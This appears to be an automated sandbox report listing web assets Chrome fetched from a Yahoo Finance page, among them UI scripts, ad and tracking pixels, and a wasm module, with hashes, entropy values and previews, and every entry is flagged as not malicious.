                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/index.C_UqkgE3.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{a1 as x,a2 as f}from"./scheduler.Dr9AAxFe.js";function h(t){const r=t-1;return r*r*r+1}function v(t){return t/=.5,t<1?.5*t*t:(t--,-.5*(t*(t-2)-1))}function F(t,{delay:r=0,duration:p=400,easing:c=x}={}){const s=+getComputedStyle(t).opacity;return{delay:r,duration:p,easing:c,css:a=>`opacity: ${a*s}`}}function w(t,{delay:r=0,duration:p=400,easing:c=h,x:s=0,y:a=0,opacity:l=0}={}){const i=getComputedStyle(t),d=+i.opacity,n=i.transform==="none"?"":i.transform,e=d*(1-l),[u,y]=f(s),[_,m]=f(a);return{delay:r,duration:p,easing:c,css:($,g)=>`....transform: ${n} translate(${(1-$)*u}${y}, ${(1-$)*_}${m});....opacity: ${d-e*g}`}}function C(t,{delay:r=0,duration:p=400,easing:c=h,axis:s="y"}={}){const a=getComputedStyle(t),l=+a.opacity,i=s==="y"?"height":"width",d=parseFloat(a[i]),n=s==="y"?["top","bottom"]:["left","right"],e=n.map(o=>`${o[0].toUpperCase()}${o.slice(1)}`),u=parseFloat(a[`padding${e[0]}`]),y=parseFloat(a[`padding${e[1]}`]),_=parseFloat(a[`margin${e[0]}`]),m=parseFloat(a[`margin$
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):674
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.5533062694914435
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:6v/7lTWdr2y4EpIRBbYVmD9jH6jkhplhXe4QKoFS6cTWtuM6Ae8S3uk5+:8ukEaRBbd92GLhyKwcH8Kj8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:25A8A1E3479B793E8BCDDC8B2BA726A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:248492192BB393C84661DAAB721FCC5D0B82D165
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2D5A29E2C8A731B9C0891DFA54C3BF753AD5BBA2911E71EBCA654C273CF08748
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:758BAE768D116E95D923A254204AE52624A0BF3A4578FE62BC9039659C45655240B77E9BB92433669CC90F6DE32C4DF4E5BD83FC632F7C71A85A285446272159
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s2.coinmarketcap.com/static/img/coins/64x64/825.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@......iq....iIDATx^.=n.0..9.G..8.G..8B..."%.. &6z.$$6&.P.6.V.V_U..u.....?.....v...z.L&....N...;../..Qo`.x.b..T.!P.:....3p.t.b).L&_....5.`....u....iQ.aij.j,-.ah0.Rmp.....J.......C..Y........3e<!.X.W+....k......l;..9....8...@.......(.@.0..uI.TU,.Z...Y.....E.......B.o._..........'}.i..m..4.T...OR.?O'....n.>.T0Z..kM.4..o^`..\....h..V......t...U.x.#L.... ...c.^w->J.5....P.m...V{..=Eu\...T.= .$..lh.....w,...&....su..x.....&."..Y.o.z.a]5h...R.x..&..s..5...\...p..nh..x......^.`.zo.w,.I.k.....zk.C.$.zi.C.d...J.M..0.0.PF.&.W.O\.@N.../..vk.`.L.L..$."LM.,F....Ra*'.9..6T....../.4.i..`..K.E.T..>..d2q..2%Vh.C.p....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (1763)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):39038
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.430664050428052
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:a5/nVk+G9hMlWTSwx832cQyHaSaSmAjiT:a1Vk+G6lWuwx8fLabSNU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E073798C657A0FC59453B8B6ADEDCEBA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:401AB66A92A6716CD4C981894D47F679FC1AE9AB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EB66C7C9D097D5BA414230F422484C17FA6F37157D30E1DED2CC5F65A9667987
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:866345625C19C0256BE9BF9F383291E645C6B64124A43BDD1C02F92FC2AE0F0AD985A15FF39319456B679B73B058290C0A0FE10C073D76F2C5976D8ED8D84A49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://tpc.googlesyndication.com/sodar/62bHydCX.html
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>.<meta charset=utf-8><script>.(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},p="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ba=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},r=ba(this),t=function(a,b){if(b)a:{var c=r;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&p(c,a,{configurable:!0,writable:!0,value:b})}};.t("Symbol",function(a){if(a)return a;var b=function(h,f){this.Ca=h;p(this,"description",{configurable:!0,writable:!0,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3771), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3771
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.293003105028217
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:dWFMWC16GwgKEty6nQAJR+9ChGZ3qcU2cXIArRRZrUkrnyfBsjys9Y0tj/1p96jK:YMWC16BgXy6nPJRrhEuIyjyKr1dKny51
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B89CAE0EEFF70E139AF64EED93353C19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:218DA476F2FE7CFA2D168CA54D0E4E84956075B8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FBCACDA475ED69433F5F60034F72C38BF7DFA6D4C89F7EE7A2C2F88945F813B5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6FDD739D2ADD3CB4D2AC2A825F28216A4A456C9CB4D58A2951877C8E739CAD7F0A88056EF4042FCB0233549FFDAF8DB1724B1942E1F3D459B4E89BF52D38AE6E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://c.betrad.com/durly.js?;ad_wxh=728x90;coid=971;nid=101960;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){var h=/ip(hone|od)|(android).+mobile|opera m(ob|in)i/i.test(navigator.userAgent)||/Android/.test(navigator.userAgent)||/iPhone/.test(navigator.userAgent)||/iPad/.test(navigator.userAgent);var c="c.evidon.com";var b;b="r231121";var a={},d=document.getElementsByTagName("SCRIPT"),l=window.location.href.indexOf("http://")===0?"http://":"https://",e=l+c;window.BAPStart=function(s){try{BAP.start(s)}catch(q){var o=window._bab||[];var r={};for(var t in s){if(s.hasOwnProperty(t)){r[t]=s[t]}}o.push(r);window._bab=o}};function i(o){return true}function m(){try{return window.localStorage&&window.postMessage}catch(o){return false}}function j(p,o,w){if(h){var q=document.URL.indexOf("http://")===-1&&document.URL.indexOf("https://")===-1;if(q){return 1}var v=window.navigator.userAgent.toLowerCase();if(/android/.test(v)){var r=document.documentElement;var x=Math.abs(parseInt(p,10)-r.clientWidth)<10;var s=Math.abs(parseInt(o,10)-r.clientHeight)<5;return x&&s&&!w?1:0}else{var u=window.navigat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ral248z7j.wc.06yahoo.com/pixel.gif
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (29594), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):29594
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.176931694017593
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:U9ohsHpxsgDD9G9uiQ9xYBEgH5CDE486Cfiniln7dB1Qg7Nx6/SRRzLC78eA1bOr:U4gDRNgtmSiniln7dB1QSm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:AD4B4808C249D200DF8BCDB043AC4611
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:80F6F690F592E8E1975CB27B9281B6F49FA81C66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:117A49648BFB149AE0636D4C6397DADBE8AAAB4EE5BB8A35DB9318379B7F6CA2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BD1124DD9EADDB5B10AAF23C4D270C06A4FF98C15542F38D7C878EE7DD4947EC42FB54838A5B8E2F3C5D80B0086503CE16BBB157F630C517998EA1646C05234E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-autocomplete",[],t):"object"==typeof exports?exports["wafer-autocomplete"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-autocomplete"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(i){if(a[i])return a[i].exports;var n=a[i]={i:i,l:!1,exports:{}};return e[i].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var i=window.webpackJsonpwafer_wafers_wafer_autocomplete;window.webpackJsonpwafer_wafers_wafer_autocomplete=function(t,a,r){for(var o,s,l=0,u=[];l<t.length;l++)s=t[l],n[s]&&u.push(n[s][0]),n[s]=0;for(o in a)Object.prototype.hasOwnProperty.call(a,o)&&(e[o]=a[o]);for(i&&i(t,a,r);u.length;)u.shift()()};var a={},n={1:0,2:0};return t.e=function(e){function i(){s.onerror=s.onload=null,clearTimeout(l);var t=n[e];0!==t&&(t&&t[1](new Error("Loading chunk "+e+" failed.")),n[e]=void 0)}var a=n[
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:WebAssembly (wasm) binary module version 0x1 (MVP)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):281481
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.316916763690954
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6144:zD4xJtMCTEmv9zg/nD6RBtEdKxpokJijli+yxpokJijE/+RfatsDCRxSqefatsD9:zD4IsSUK761uUWP3B62bP
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:07458752C1AC837FCEE9288DAC8D3C5B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C1FCD210C8BFEFEC53CA0AB922409FD5B806CA41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:92322D1CABAA55C8E216C983E58670043B063AF59D86A7B6AE8201452FF7987F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1D32CB31350619B05834E9B95E968B86D7EFB9B738B5D7584E25AFE959580AD160FA926C81EA9EC4917F86DBFE651AAF831E2DEDDDF0AA4CDDC438FBAB19C6AC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.asm.......#`....`.....`...`......`....`.....`...`.......`......`.........`........`..`.......`........`..|......`..~..~`.........`..~~..`..........`...~..`.~...`....}`......~.`.....}.`...~.`..~.`.}}..`...|......`..}...`.~....`...}`....|`.....|`.~~.|`.|..|.....env.__cxa_allocate_exception...env.__cxa_throw...wasi_unstable.fd_write...wasi_unstable.fd_close...wasi_unstable.environ_sizes_get...wasi_unstable.environ_get...env.abort...env.emscripten_resize_heap...env.emscripten_memcpy_big...env.setTempRet0...wasi_unstable.fd_seek...env.memory.....env.table.p...................................................................................................... ..................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (5462), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):5462
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.597687583541889
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:CGreTUNs2Bqt82BqhysyrbF7S5Rp3Jw7XfLDfjuafdCbInwspMuU1bW3:+e9BqLBq7Zi7PKR0FQM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:79DFF7765347CAF582E3075A7C287D6E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E60C1760E3FC6B886E89BF404F1C81D499B55E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF6E1A0ACAF6E29F88F4E460625856E591CC4C57542B2FC2F1A61FF213CBA1D2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:57F2025AF5241542A10EBB9358D5F763FAAD9481D6BC99831EF601F4E69B0B4582F1727771F8BD83332047B28762537CEEACD861162CE1EA42414D0C57C125E9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://image6.pubmatic.com/AdServer/PugMaster?sec=1&async=1&kdntuid=1&rnd=69435455&p=156212&s=0&a=0&ptask=ALL&np=0&fp=0&rp=0&mpc=0&spug=1&coppa=0&gdpr=0&gdpr_consent=&us_privacy=1YNN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:PubMatic.loadAsyncImagePixel('https://sync.crwdcntrl.net/qmap?c=240&tp=PUBM&tpid=0E953B97-4F55-458F-AF4A-D3EA6DD13C81&gdpr=0&gdpr_consent=');PubMatic.loadAsyncImagePixel('https://cr.frontend.weborama.fr/cr?key=pubmatic&gdpr=0&gdpr_consent=');PubMatic.loadAsyncImagePixel('https://mwzeom.zeotap.com/mw?zpartnerid=1384&env=mWeb&gdpr=0&gdpr_consent=&cid=0E953B97-4F55-458F-AF4A-D3EA6DD13C81');PubMatic.loadAsyncImagePixel('https://uipglob.semasio.net/pubmatic/1/info?sType=sync&sExtCookieId=0E953B97-4F55-458F-AF4A-D3EA6DD13C81&sInitiator=external&gdpr=0&gdpr_consent=');PubMatic.loadAsyncImagePixel('https://cm.g.doubleclick.net/pixel?google_nid=pmeb&google_sc=1&google_hm=DpU7l09VRY-vStPqbdE8gQ%3D%3D&gdpr=0&gdpr_consent=');PubMatic.loadAsyncImagePixel('https://cm.g.doubleclick.net/pixel?google_nid=pubmatic&google_cm&google_sc&gdpr=0&gdpr_consent=');PubMatic.loadAsyncImagePixel('https://um.simpli.fi/pubmatic?https://simage2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9ODA2JnRsPTUxO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ade.googlesyndication.com/ddm/activity/dc_oe=ChMI8ee4mr__iAMV0KqDBx1jmwc-EAAYACDqw_VbQhMIoqSQmL__iAMVWoeDBx0tvgLI;dc_eps=AHas8cDNTafoggHSyQg3Ru7exsF0rapUZG5wNAqicxFSNYHvvpaFhBWH9qlid_D8sUAHw9ICQd1WtU18YHhIjLgIIbU;met=1;&timestamp=1728414926589;eid1=2;ecn1=0;etm1=15;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):48
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.9701755214643475
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:YEOBHGm7ARKC01H9n:YEOB9AQlH9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:872947B4A260FEF29716EE10B12CDF3B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FD41E92E8D439262BC0658CB0B3B624E09741257
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:73642CB5E5B8ACCCBB645620BA632CF022033C0448002F447CD808FE7216A129
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:DC6038F9F98EA91754A85D87C58BDC5FA5AAC450CE965997E9FEA388E789A2A0822F9D0C793A72D2F5663383EB1D9E7D8181624848868C185FB700678009C6BF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ups.analytics.yahoo.com/ups/58784/sync?format=json&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"axid": "y-d5tzQeFE2uJXDidStQE4wZoQ.H.eGImJ~A"}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (12433), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):12433
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.202182615598781
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:3cmi6DAQ/946S4Y4+A09psvNYh8EhatYwQ:MTYxRY46psvNYh+Q
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9EC69A2055C595F415EADE096A476B0D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:472B77037C2765E09666F43CCFBC01EF40783571
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4F06D94CB6038F42F5C8D59D369AB21C3C54643A544B0824582CB00EBB61DFB8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:EC87EFA9D26546AD67D9CB65932AF47D8FBA77D0298E1567E2A11DB679BE045C761C3A6ADC131CC44BDBC7D95C522982FA9EE9F221155BB1FD2E38864E25EC3D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-toggle",[],t):"object"==typeof exports?exports["wafer-toggle"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-toggle"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(r[n])return r[n].exports;var o=r[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}func
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://dsum-sec.casalemedia.com/crum?cm_dsp_id=235&external_user_id=7fee837b-1bb3-4daa-bf0a-0325024aa314&gdpr=&gdpr_consent=&us_privacy=1YNN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (53168)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):54470
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.746423144143212
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:jam2fjAWPdFSwx4VkmSPj2yoxswy3gfjVfAnSJiAq:4xqUjL3aNq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:428B235509864AAA8E2EBE79431422EE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A8E28DA93B5C19E95F26AA2D9887BCE52AA8A9F9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:38B53642CECBEA3EC633EAA06BC0267101A489FD7F1D318BB6E7026CAFBE8616
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D39653918FABEEE2D30BF0C274F6DD29854CC486C626938D21BB3F25BECE069DCAEFFE0837AB81541613903FA3660CF06BDC7EE41ABDE366CEC901AC951355E3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pagead2.googlesyndication.com/bg/OLU2Qs7L6j7GM-qga8AmcQGkif1_HTGLtucCbK--hhY.js
